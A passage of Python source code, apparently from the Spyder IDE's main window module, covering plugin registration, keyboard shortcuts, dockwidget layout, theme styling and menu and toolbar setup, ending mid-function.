# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app.find_plugins import (
find_external_plugins, find_internal_plugins)
from spyder.app.utils import (
create_application, create_splash_screen, create_window, ORIGINAL_SYS_EXIT,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is available."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
console = self.get_plugin(Plugins.Console, error=False)
if console:
console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
PLUGIN_REGISTRY.set_main(self)
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
registry_internal_plugins = {}
registry_external_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
if plugin_name in internal_plugins:
registry_internal_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
else:
registry_external_plugins[plugin_name] = (
plugin_main_attribute_name, plugin)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
PLUGIN_REGISTRY.set_plugin_enabled(plugin_name)
PLUGIN_REGISTRY.set_all_internal_plugins(registry_internal_plugins)
PLUGIN_REGISTRY.set_all_external_plugins(registry_external_plugins)
# Instantiate internal Spyder 5 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPluginV2):
PLUGIN_REGISTRY.register_plugin(self, PluginClass,
external=False)
# Instantiate internal Spyder 4 plugins
for plugin_name in internal_plugins:
if plugin_name in enabled_plugins:
PluginClass = internal_plugins[plugin_name]
if issubclass(PluginClass, SpyderPlugin):
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=False)
self.preferences.register_plugin_preferences(
plugin_instance)
# Instantiate external Spyder 5 plugins
for plugin_name in external_plugins:
if plugin_name in enabled_plugins:
PluginClass = external_plugins[plugin_name]
try:
plugin_instance = PLUGIN_REGISTRY.register_plugin(
self, PluginClass, external=True)
except Exception as error:
print("%s: %s" % (PluginClass, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = PLUGIN_REGISTRY.register_plugin(self, mod,
external=True)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if not hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.thirdparty_plugins.append(plugin)
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.plugins.mainmenu.api import (
ApplicationMenus, ToolsMenuSections, FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut,
id_='file_switcher')
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut,
id_='symbol_finder')
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None]
if self.get_plugin(Plugins.Editor, error=False):
self.edit_menu_actions += self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
id_='spyder_path_action')
from spyder.plugins.application.container import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = ApplicationActions.SpyderWindowsEnvVariables
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action,
before_section=ToolsMenuSections.External
)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
try:
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(
self._INTERNAL_PLUGINS_MAPPING[attr], error=False)
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
for plugin_name in PLUGIN_REGISTRY:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
# Tabify external plugins which were installed after Spyder was
# installed.
# Note: This is only necessary the first time a plugin is loaded.
# Afterwwrds, the plugin placement is recorded on the window hexstate,
# which is loaded by the layouts plugin during the next session.
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if plugin_instance.get_conf('first_time', True):
self.tabify_plugin(plugin_instance, Plugins.Console)
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
